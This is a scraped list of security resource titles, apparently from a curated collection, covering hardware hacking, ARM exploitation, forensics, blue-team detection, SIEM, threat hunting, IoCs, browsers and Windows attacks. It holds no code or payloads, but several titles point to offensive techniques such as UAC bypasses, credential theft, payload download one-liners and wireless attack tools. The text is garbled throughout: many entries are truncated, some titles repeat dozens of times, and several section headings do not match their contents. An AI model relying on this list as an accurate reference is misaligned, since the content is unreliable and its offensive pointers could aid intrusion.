• Breaking the Bluetooth Pairing: Fixed Coordinate Invalid Curve Attack
• hcxdumptool
• Unlocking free WiFi on British Airways
• Valetudo - only operation. [repo](https://github.com/Hypfer/Valetudo)
• Wifi-Ducky-ESPUSB
• Analyzing a buffer overflow in the DLINK DIR-645 with Qiling framework, Part I
• HammerKit - source library for inducing and characterizing rowhammer that provides out-of-the-box support for Chrome OS platforms.
• BLEAH
• ESP8266 Deauther Version 2
• Airspy-Utils
• infernal-twin - This is automated wireless hacking tool
• SkyJack
• eaphammer - Enterprise networks. Indirect wireless pivots using hostile portal attacks.
• whereami
• Hacking Kia: Remotely Controlling Cars With Just a License Plate
• BMC-Tools
• Hacking Printers Wiki
• awesome flipper
• Dark Flipper
• My Flipper Shits
• USB Attacks: Past, Present and Future - VTYuo&feature=youtu.be) - P4wnP1 is below on pentesting section. [wrap-up here](https://twitter.com/RoganDawes/status/1303297634858393608)
• Hacker's guide to deep-learning side-channel attacks: the theory
• Valetudo - only operation. [repo](https://github.com/Hypfer/Valetudo)

ARM

• Understanding the Glibc Heap Implementation
• Heap Exploit Development - the-wild iOS 0-day. [thread](https://threader.app/thread/1168969597799866368)
• ARM Instruction Set + Simple Heap Overflow
• Use After Free
• A Simple ROP Chain
• AZM Online Arm Assembler
• Understanding the GLIBC Heap Implementation
• ARM64 Reversing and Exploitation
• ARM64 Reversing and Exploitation
• ARM Instruction Set + Simple Heap Overflow
• Use After Free
• A Simple ROP Chain

Steganography

• Linux Incident Response Guide
• Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
• FBI Electronic Tip For
• Hash Cracking with AWS and hashcat
• TrID
• Eric Zimmerman's Tools
• MacQuisition - in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging.
• Hashcat new feature: autodetect hash-mode
• L0phtCrack - force, hybrid attacks, and rainbow tables. [gitlab repo](https://gitlab.com/l0phtcrack/l0phtcrack)
• Linux Forensics
• Tsurugi Linux
• Digital Forensics and Incident Response
• file Signatures
• Cloud Forensics Triage Framework (CFTF)
• Forensic Investigation
• O-Saft
• PcapXray - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
• swap_digger - exploitation or forensics
• The Sleuth Kit® (TSK)
• CDQR
• MacForensics
• imago-forensics
• remedi-infrastructure
• libelfmaster
• usbrip
• KAPE - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. [blog post](https://www.kroll.com/en/insights/publications/cyber/kroll-artifact-parser-extractor-kape). [KAPE docs](https://ericzimmerman.github.io/KapeDocs/) and [KAPE Files](https://github.com/EricZimmerman/KapeFiles)
• AVML
• turbinia
• Kuiper
• PowerForensics
• OfficeForensicTools
• CHIRP
• Foremost
• image-unshredding
• MVT
• Andriller CE (Community Edition) - only, forensically sound, non-destructive acquisition from Android devices.
• Dshell
• ShredOS x86_64 - Disk Eraser - Secure disk erasure/wipe.
• dfir_ntfs
• MemProcFS
• LeechCore
• PCILeech

PDF

• PDF Tools
• How to Protect Files With Canary Tokens
• How to remove malicious code from PDF files
• Attacks on PDF Certification
• Insecure Features in PDFs. - in-security.blogspot.com/2021/01/insecure-features-in-pdfs.html)
• Shadow Attacks … the smallest attack vector ever
• mu tools
• PDF forensics with Kali Linux : pdfid and pdfparser
• How can I extract a JavaScript from a PDF file with a command line tool?
• peepdf
• How to Protect Files With Canary Tokens

Email Headers

• Configuring MTA-STS and TLS Reporting For Your Domain
• Google Admin Toolbox
• Azure Message Header Analyzer

Distros

• e-Fense Helix 3
• black arch
• List of Live Distributions for Computer Forensics
• CAINE
• List of Live Distributions for Computer Forensics

Volatility

• Volatility, my own cheatsheet (Part 1): Image Identification
• First steps to volatile memory analysis
• Building a profile for Volatility
• Memory Forensics and Analysis Using Volatility
• volatility
• Volatility profiles for Linux and Mac OS X
• OROCHI
• AutoVolatility
• Memory Forensics and Analysis Using Volatility
• MemLabs - styled labs for individuals interested in Memory Forensics.

Volatility

• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Welcome to Stealthbits Attack Catalog
• Data Sources, Containers, Cloud, and More: What’s New in ATT&CK v9?
• Windows-specific MITRE ATT&CK techniques application control prevention assessment. - signed code to execute and any line of business applications. It does not make assumptions about blocking built-in abusable applications.
• MITRE D3FEND
• Profile Sysmon logs to discover which LOLBAS binaries have ran and what they're command line arguments were
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Your detections aren't working
• Technical Approaches to Uncovering and Remediating Malicious Activity - 245A).
• Cobalt Strike Beacon Analysis - k/)
• How to Design Detection Logic - Part 1
• Evilginx-ing into the cloud: How we detected a red team attack in AWS
• Hidden Shares as bait
• Best Practices for MITRE ATT&CK® Mapping - cert.cisa.gov/best-practices-mitre-attckr-mapping)
• Awesome Honeypots
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Windows Advanced Audit Policy Map to Event IDs
• MitigatingPass-the-Hashand OtherCredential Theft
• The DML model
• hashlookup CIRCL API
• BLUE TEAM LABS ONLINE
• There are a lot of ways that folks distinguish between blue team roles. My focus is on investigative work and cognitive skills, so I divide those roles into the mental model shown in this diagram.
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• EU MITRE ATT&CK® Community
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team 201: Detection
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Defining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Analisando ameaças com Mitre ATT&CK Navigator
• ATT&CK™ Navigator - navigator).
• Sysmon 12.0 — EventID 24 - us/sysinternals/downloads/sysmon) is out, with a new event ID: number 24. A very useful new feature, clipboard monitoring.
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• Blue Team fundamentals Part Two
• Blue Team Fundamentals
• tinypw
• ATTACK-Tools
• Atomic Threat Coverage
• atomic-red-team
• Welcome to Stealthbits Attack Catalog
• Splunk Attack Range
• attack-scripts
• Mitre Att&ck Matri
• DeTTECT
• SysmonX - In Replacement of Sysmon.
• SysmonSimulator
• T-Pot
• Sooty - in-one CLI tool to automate and speed up workflow.
• elastalert
• EVTX-ATTACK-SAMPLES
• takuan
• CobaltStrikeScan
• Hunting and detecting Cobalt Strike
• Cobalt Strike Beacon Analysis - k/)
• Evilginx-ing into the cloud: How we detected a red team attack in AWS
• Hidden Shares as bait
• BaselineTraining - Butt Training Program: Blue Team GO!" talk.
• Practical Training for Blue Teamers
• Defining Cobalt Strike Components So You Can BEA-CONfident in Your Analysis
• There are a lot of ways that folks distinguish between blue team roles. My focus is on investigative work and cognitive skills, so I divide those roles into the mental model shown in this diagram.

SIEM

• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Suspicious Use of Procdump
• KrbRelayUp local privilege escalation.
• Events Heatmap
• Heatmaps Make Ops Better
• Auditing Continuously vs. Monitoring Continuously
• Logsspot
• Scalable Logging and Tracking
• Using Flume to Collect Apache 2 Web Server Logs
• spectx
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Here's a Splunk way to score behaviors that are derived from detections
• The Log Pile
• Shipping to Elasticsearch Microsoft DNS Logs
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Logs were our lifeblood. Now they're our liability.
• The log/event processing pipeline you can't have
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Part of my role is ensuring we're *not* EDR-centric. We have to be able to detect threats w/o OS-level viz (e.g., control plane only), using auth/net events, or whatever data is in a SIEM
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Using Flume to Collect Apache 2 Web Server Logs
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Log Parser Lizard
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Scalable Logging and Tracking
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Auditing Continuously vs. Monitoring Continuously
• Scalable Logging and Tracking
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Scalable Logging and Tracking
• Scalable Logging and Tracking
• Scalable Logging and Tracking
• Scalable Logging and Tracking
• Scalable Logging and Tracking
• Sigma
• plaso
• graylog-guide-snort
• TALR
• Auditing Continuously vs. Monitoring Continuously
• Corsair
• Scalable Logging and Tracking
• Using Flume to Collect Apache 2 Web Server Logs
• spectx
• Building a SIEM: combining ELK, Wazuh HIDS and Elastalert for optimal performance
• Here's a Splunk way to score behaviors that are derived from detections
• ProductLoggingTracker
• Part of my role is ensuring we're *not* EDR-centric. We have to be able to detect threats w/o OS-level viz (e.g., control plane only), using auth/net events, or whatever data is in a SIEM
• LORG
• Shipping to Elasticsearch Microsoft DNS Logs
• Windows 10 ETW Events - based and mof-based ETW providers across Windows 10 versions.
• Fluentd
• Laurel
• Matano - source [security lake platform for AWS](https://www.matano.dev/blog/2022/08/11/announcing-matano).
• Heatmaps Make Ops Better

Threat Hunting

• Comprehensive Threat Intelligence
• 3 of the main observed false positive ive learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 pref host for backdoors implemented as dll or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTPs traces)
• thethe - focused and expandable threat hunting environment. [The Threat Hunting Environment](https://github.com/ElevenPaths/thethe)
• opencti - Platform/opencti)
• Cortex-Analyzers
• Nimbus Network - class threat intelligence.
• A Top 10 Reading List if You’re Getting Started in Cyber Threat Intelligence
• HELK - [The Hunting ELK](https://github.com/Cyb3rWard0g/HELK): The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack.
• Termshark
• Wireshark Tutorial: Wireshark Workshop Videos Now Available
• Wireshark Tutorial: Decrypting HTTPS Traffic
• Insider Threat Hunting - all-in-numbers.html).
• Cyber Threat Intelligence
• Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement – Under the Radar
• CTI SquadGoals
• MISP CERT.br
• Packetor - dump packet analyzer / decoder.
• Lookup Before You Go-Go...Hunting
• Wazuh - ready security monitoring solution for threat detection, integrity monitoring, incident response and compliance. [repo](https://github.com/wazuh/wazuh) and [ansible](https://github.com/wazuh/wazuh-ansible)
• Hunting the Hunters - RCE in Covenant C2
• Threat Intelligence Naming Conventions: Threat Actors, & Other Ways of Tracking Threats
• Datafeeds/API
• The State of Threat Hunting and the Role of the Analyst
• SQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike
• All Access Pass: Five Trends with Initial Access Brokers - access-broker-landscape.html) [tt](https://twitter.com/jorgeorchilles/status/1452739074775781390/photo/1)
• MISP Training - Youtube CIRCL
• Youtube CIRCL
• More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting - hacking-group-built-its-own-vpn-network/). [APT33, the Iranian hacking group behind Shamoon, built its own VPN network](https://twitter.com/campuscodi/status/1194872593750216704).
• Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack
• Adversary Reports
• PyMISP and MISP Objects: a door to new opportunities
• What is APT28's Drovorub Malware? - 1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF)
• TA505
• SolarWinds Security Advisory
• If you work in a SOC, print out this screenshot & pin it to a wall in your office
• Customer Guidance on Recent Nation-State Cyber Attacks
• Mapping out AridViper Infrastructure Using Augury’s Malware Module
• APT Encounters of the Third Kind
• Lazarus APT conceals malicious code within BMP image to drop its RAT - found new [weaponized Word document](https://twitter.com/ESETresearch/status/1389904254811394049)
• Analysis of the Iranian cyber attack landscape
• Update on cyber activity in Eastern Europe
• Analysis Report (AR20-268A)
• A Threat Actor Encyclopedia
• The Story of Jian - Day
• distribute malicious zip with lnk? MSHTA > wscript > new LNK in startup > Reboot > MSHTA > wscript.
• Lemon Duck spreads its wings
• threat actortouching an endpoint
• Armagedon/Gamaredon
• Cisco Talos shares insights related to recent cyber attack on Cisco
• Wireshark For Network Threat Hunting: Creating Filters - Active Countermeasures
• Wireshark Tutorial: Exporting Objects from a Pcap
• Hex Packet Decoder
• MISP Concepts Cheat sheet
• teslacoil.py
• APT29 targets COVID-19 vaccine development
• Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS'​ Malware at Scale
• More Evidence of APT Hackers-for-Hire Used for Industrial Espionage
• US Charges Five Alleged Members of APT41 Group
• Cyber Planning for Response and Recovery Study
• Lazarus APT conceals malicious code within BMP image to drop its RAT - found new [weaponized Word document](https://twitter.com/ESETresearch/status/1389904254811394049)
• The Active Adversary Playbook 2021
• An Update on Industrialize the Tracking of Botnet Operations
• Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor - solarwinds/) [repo](https://github.com/ThunderGunExpress/BADministration), symantec: [Supply Chain Attack Targets SolarWinds Users](https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds). [DGA domain names from](https://github.com/RedDrip7/SunBurst_DGA_Decode) SunBurst_DGA_Decode
• North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign
• Capturing Network Packets from Windows Endpoints with Network Shell (Netsh) ⚔️ and Azure Network Watcher 🌩
• Tracking A Malware Campaign Through VT
• Interesting large and small malspam attachments from 2023 - vbe.py) [scripts](https://github.com/JohnHammond/vbe-decoder/blob/master/vbe-decoder.py)
• Operation Triangulation: The last (hardware) mystery
• Mapping out AridViper Infrastructure Using Augury’s Malware Module
• Additional MISP training materials (including slides, documentation and videos
• Comprehensive Threat Intelligence
• strelka
• Threat-Hunting
• ThreatHunter-Playbook
• HELK - [The Hunting ELK](https://github.com/Cyb3rWard0g/HELK): The Hunting ELK or simply the HELK is one of the first open source hunt platforms with advanced analytics capabilities such as SQL declarative language, graphing, structured streaming, and even machine learning via Jupyter notebooks and Apache Spark over an ELK stack.
• mordor - play Adversarial Techniques.
• ioc_writer
• 3 of the main observed false positive ive learned while hunting for cmd.exe as a child proc of rundll32.exe (still one of the top 3 pref host for backdoors implemented as dll or alike) #threathunting (understanding this kind of FPs is as important as learning new/old TTPs traces)
• cyber-threat-response-clinic
• securityonion - release) - Linux distro for threat hunting, enterprise security monitoring, and log management
• TheHive
• TheHive4py
• TheHiveIRPlaybook
• Nimbus Network - class threat intelligence.
• ja3
• Threat Hunting Process
• Threat Hunting Princiĺes
• TypeDB CTI - a-knowledge-graph-for-cyber-threat-intelligence-with-typedb-bdb559a92d2a)
• API-To-Event - forge](https://github.com/hunters-forge/notebooks-forge), [BloodHound Notebooks](https://github.com/hunters-forge/bloodhound-notebooks)
• Yeti - platform.github.io/) [Threat Intelligence](https://github.com/fr0gger/yeti)
• Watcher
• traffic-analysis-workshop - tutorial-decrypting-HTTPS-traffic](https://github.com/pan-unit42/wireshark-tutorial-decrypting-HTTPS-traffic)
• Packetor - dump packet analyzer / decoder.
• Lookup Before You Go-Go...Hunting
• Insider Threat Hunting - all-in-numbers.html).
• Passive SSH - ssh](https://github.com/d4-project/passive-ssh)
• Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement – Under the Radar
• D4 core
• BeaconEye
• Datafeeds/API
• Deepfence ThreatMapper
• SQUIRRELWAFFLE Leverages malspam to deliver Qakbot, Cobalt Strike
• All Access Pass: Five Trends with Initial Access Brokers - access-broker-landscape.html) [tt](https://twitter.com/jorgeorchilles/status/1452739074775781390/photo/1)
• Paint it, Blue - Transitionin from CTI to HUNT
• MISP (core software) - Open Source Threat Intelligence Platform (formely known as Malware Information Sharing Platform)
• MISP galaxy
• DigitalSide Threat-Intel - Intel repository. [API](https://github.com/davidonzo/apiosintDS)
• MISP-sizer
• MISP RPM
• ansible MISP
• misp-warninglist - positives or other information in indicators
• MISP-maltego
• misp-modules
• misp-taxonomies
• PyMISP
• CyCAT.org API services - end server including crawlers.
• MISP Training - Youtube CIRCL
• Youtube CIRCL
• PyMISP and MISP Objects: a door to new opportunities
• Additional MISP training materials for law-enforcement agencies
• More than a Dozen Obfuscated APT33 Botnets Used for Extreme Narrow Targeting - hacking-group-built-its-own-vpn-network/). [APT33, the Iranian hacking group behind Shamoon, built its own VPN network](https://twitter.com/campuscodi/status/1194872593750216704).
• Dismantling a fileless campaign: Microsoft Defender ATP’s Antivirus exposes Astaroth attack
• Adversary Reports
• What is APT28's Drovorub Malware? - 1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF)
• Dispatches from Drovorub: Network Threat Hunting for Russia GRU GTsSS'​ Malware at Scale
• Analysis Report (AR20-268A)
• TA505
• SolarWinds Security Advisory
• If you work in a SOC, print out this screenshot & pin it to a wall in your office
• Customer Guidance on Recent Nation-State Cyber Attacks
• distribute malicious zip with lnk? MSHTA > wscript > new LNK in startup > Reboot > MSHTA > wscript.
• Lemon Duck spreads its wings
• threat actortouching an endpoint
• China’s PLA Unit 61419 Purchasing Foreign Antivirus Products, Likely for Exploitation
• APTnotes - available papers and blogs (sorted by year) related to malicious campaigns/activity/software that have been associated with vendor-defined APT (Advanced Persistent Threat) groups and/or tool-sets. [some tools](https://github.com/aptnotes/tools)
• Patchwork APT caught in its own web
• Armagedon/Gamaredon
• North Korea’s Lazarus APT leverages Windows Update client, GitHub in latest campaign
• Cisco Talos shares insights related to recent cyber attack on Cisco

IoCs

• CVE-2020-1472 Zerologon IoCs
• Ryuk Speed Run, 2 Hours to Ransom
• What did DeathStalker hide between two ferns?
• Netfilter Rootkit Samples
• IcedID | 31.08.2022 | Campaign 2786525712
• Yikes, Microsoft have signed multiple rootkits (which allow kernel drivers) and reach out to a remote IP
• There are evil packages on the npm registry that deploy XMRIG
• 238 Cobalt Strike stage 2 IP's, with 238 unique configurations, identified today.
• Feodo Tracker
• Emotet 2022 | epoch4 | 22.04.2022 |
• sophos labs IoCs - originated indicators-of-compromise from published
• DailyIOC
• iocs
• Threat intelligence and threat detections
• APT_Digital_Weapon - AnXin.
• Yikes, Microsoft have signed multiple rootkits (which allow kernel drivers) and reach out to a remote IP
• There are evil packages on the npm registry that deploy XMRIG
• 238 Cobalt Strike stage 2 IP's, with 238 unique configurations, identified today.
• malware-IoC

SIEM

• Firefox: How a website could steal all your cookies
• How To Blow Your Online Cover With URL Previews
• Firefox: How a website could steal all your cookies
• New Cache ATtacks on TLS Implementations
• Nefarious LinkedIn
• Firefox: How a website could steal all your cookies
• Online Trackers Increasingly Switching to Invasive CNAME Cloaking Technique
• SOK: On the Analysis of Web Browser Security
• Bypassing Browser Security Warnings with Pseudo Password Fields
• BROWSERGAP
• Crash Chrome
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• BROWSERGAP
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Firefox: How a website could steal all your cookies
• Nefarious LinkedIn
• Lightnion
• Puppeteer
• uBlock Origin
• autochrome
• browsergap.ce
• Firefox: How a website could steal all your cookies

Browsers Addons

• (Image) WebDeveloper
• DownthemAll
• Uppity
• Cliget
• (Image) URLs List
• Link Redirect Trace
• Tamper Data for FF Quantum
• Addons for Firefox
• LinkGopher
• (Image) IPvFoo
• SixorNot
• Wappalyzer
• Exif Viewer
• BuiltWith
• Addons for Firefox
• Anti-Grabify Browser Extension

Windows

• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Introducing BloodHound 4.0: The Azure Update
• Case Study: Password Analysis with BloodHound
• Updating Mimikatz in Metasploit
• A PowerShell utility to dynamically uncover a DCShadow attack
• Total Meltdown?
• Remote-Desktop-Caching
• Capturing NetNTLM Hashes with Office [DOT
• PowerShell Remoting
• Dynamic Tracing in Windows 10 19H1
• LoL Malware Meets Python-Based Command and Control (C2) Server, Part I
• Passing-the-Hash to NTLM Authenticated Web Applications
• pdf - Bulazel-Reverse-Engineering-Windows-Defender-Demo-Videos/)
• Windows Command-Line
• XOR encryption – Windows x64
• Building Cracked Binaries – Windows x64
• Windows Incident Response: Updates
• Event log 'Keywords' p1
• Windows 10 - Notifications
• UAC bypass using CreateNewLink COM interface
• Windows Privilege Escalation (Unquoted Path Service)
• Securing SCOM in a Privilege Tiered Access Model
• Windows Privilege Escalation Guide
• An introduction to privileged file operation abuse on Windows
• Control Flow Guard Teleportation - Interactive CTF Exploration Tool
• PsExec Local Privilege Escalation
• Remote NTLM relaying through meterpreter on Windows port 445
• Analyzing obfuscated powershell with shellcode - exploitation agent.](https://github.com/EmpireProject/Empire). [OVERVIEW OF EMPIRE 3.4 FEATURES](https://www.bc-security.org/post/overview-of-empire-3-4-features/)
• Empire 4.2 was just finalized over the weekend and we are excited to share some of the new features.
• Panache_Sysmon
• Hiding malware in Windows
• Bypassing AppLocker Custom Rules
• WSL Reloaded
• Windows oneliners to download remote payload and execute arbitrary code
• reflectivepotato
• Microsoft Windows win32k.sys - Security Research
• Lateral movement using URL Protocol
• One Windows Kernel
• The Dog Whisperer’s Handbook
• Attack and Defend microsoft enhanced security administrative environment
• Recovering Plaintext Domain Credentials from WPA2 Enterprise on a Compromised Host
• How to steal NTLMv2 hashes using file download vulnerability in web application
• Leveraging WSUS
• Yet another sdclt UAC bypass - elevated process. These processes have the particularity to run with high integrity level without prompting the local admin with the usual UAC window.
• Reversing and Patching .NET Binaries with Embedded References
• Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript
• Windows PowerShell Remoting
• .NET Manifesto
• Bypassing Windows User Account Control
• Run PowerShell without Powershell.exe
• Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor
• Privileged Access Workstations
• Activation Contexts - loading opportunities into every process, and to perform COM hijacking without touching the registry. Unfortunately, the manifest could be replaced by another version, possibly killing your persistence by surprise.
• Understanding WdBoot (Windows Defender ELAM)
• Microsoft Finally Releases Guidance and a Script to Change the KRBTGT Account
• Deploying honeytokens in Active Directory & How to trick attackers with deceptive BloodHound paths
• CrackMapExec
• Configuring Additional LSA Protection
• Getting Malicious Office Documents to Fire with Protected View Enable
• Overview and Setup
• Blocking Process Creation
• Access Tokens and Access Checking
• Blocking DLL Loading
• A Speed-Research on Windows Explorer's Auto-Completion
• Microsoft Defender Advanced Threat Protection (ATP)
• SharePoint and Pwn
• DisableAntiSpyware
• Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter?
• Certify SSL Manager
• Bypassing Credential Guard
• WSUS Attacks Part 1: Introducing PyWSUS
• This is about adding a $ account and have it not show up in net users.
• pestudio
• PEview version
• FileAlyzer
• NTCore
• exeinfo
• Sysmon Internals
• PVE CA Cert List Utility - to-expire certificates
• Release the Kraken: Fileless injection into Windows Error Reporting service
• Windows security baselines
• The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment
• Block process creations originating from PSExec and WMI commands
• VDM
• Live Patching Windows API Calls Using PowerShell
• fibratus
• Adventures in Dynamic Evasion
• Fully working SMB protocol implementation in webassembly
• Parent Process vs. Creator Process
• WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732)
• Spectre exploits in the "wild"
• Security rapid modernization plan
• Windows & Active Directory Exploitation Cheat Sheet and Command Reference
• Finding writable folders and hijackable DLLs
• Do You Really Know About LSA Protection (RunAsPPL)? - lsa-protection-in-userland/) [PPLdump](https://github.com/itm4n/PPLdump): Dump the memory of a PPL with a userland exploit. [comments](https://twitter.com/itm4n/status/1385218719320875009)
• Running NetworkMiner in Windows Sandbox
• GetTempPathW function
• No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders
• Human-operated ransomware - operated ransomware is a large and growing attack trend that represents a threat to organizations in every industry.
• Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft
• Microsoft Security Best Practices
• Backdoor .NET assemblies with… dnSpy
• Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory
• EVERYONE GETS A ROOTKIT - based Devices Since Windows 8.
• If you ever see RDP events, you should parse out the RDP bitmap cache. It maps out bitmap images of a user's RDP session.
• Here are a few tool resources for using WinRM w/o PowerShell
• winrs
• Scripting in Windows Remote Management
• pywinrm
• Abusing Windows Remote Management (WinRM) with Metasploit
• Attacking RDP from Inside - card hijacking, unauthorized file system access to client machines and more
• Dynamic Invocation in .NET to bypass hooks
• LowBox Token Permissive Learning Mode
• DInjector
• Windows Kernel Introspection (WKI)
• Windows Persistence Techniques
• Gaining Domain Admin from Outside Active Directory - NS/mDNS Poisoner and NTLMv1/2 Relay)
• Low Privilege Active Directory Enumeration from a non-Domain Joined Host
• Active Directory as a C2
• Escalating privileges with ACLs in Active Directory
• #TR19 Active Directory Security Track
• Penetration Testing Active Directory, Part I
• Penetration Testing Active Directory, Part II - level, forcing us to do privilege escalation.
• Wagging the Dog - Based Constrained Delegation to Attack Active Directory.
• Exploiting PrivExchange
